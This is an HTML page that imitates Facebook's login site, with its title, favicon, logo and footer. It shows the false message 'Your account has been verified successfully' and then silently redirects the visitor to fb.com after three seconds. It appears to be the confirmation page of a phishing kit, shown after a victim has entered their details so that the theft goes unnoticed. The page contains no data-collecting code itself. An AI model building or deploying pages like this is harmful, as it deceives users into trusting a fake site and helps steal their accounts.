<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="3;URL='https://fb.com/'" />
    <link rel="shortcut icon" href="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png"
        type="image/x-icon">
    <link rel="stylesheet" href="/assets/css/stylesheet.css">
    <title>Facebook – log in or sign up</title>
</head>

<body>
    <div class="img-container">
        <img src="/assets/img/facebook.svg" width="112px" alt="">
    </div>
    <main class="flex-col items-center gap-2">
        <p style="font-size: 24px; text-align: center;">Your account has been verified successfully, you will be redirected to the homepage shortly</p>
        <img src="https://cdn1.iconfinder.com/data/icons/interface-white-with-multicolor-circle-background/2048/Like-512.png" alt="" width="80px">
    </main>
    <footer class="flex-col justify-center items-center gap-4">
        <div class="flex justify-around w-full">
            <div class="flex-col">
                <a class="lang" href="#">English (UK)</a>
                <a class="lang" href="#">Français (France)</a>
                <a class="lang" href="#">Español</a>
                <a class="lang" href="#">Deutsch</a>
            </div>
            <div class="flex-col items-center">
                <a class="lang" href="#">Português (Brasil)</a>
                <a class="lang" href="#">Français (France)</a>
                <!-- <a class="lang" href="#">Português (Portugal)</a> -->
                <a class="lang" href="#">العربية</a>
                <div class="plus"></div>
            </div>
        </div>
        <div class="flex-col items-center">
            <div class="flex gap-2 about">
                <a href="#">About</a><span class="do">.</span>
                <a href="#">Help</a><span class="do">.</span>
                <a href="#">More</a><span class="do">.</span>
            </div>
            <p class="copyright">Meta &copy; 2023</p>
        </div>
    </footer>
</body>

</html>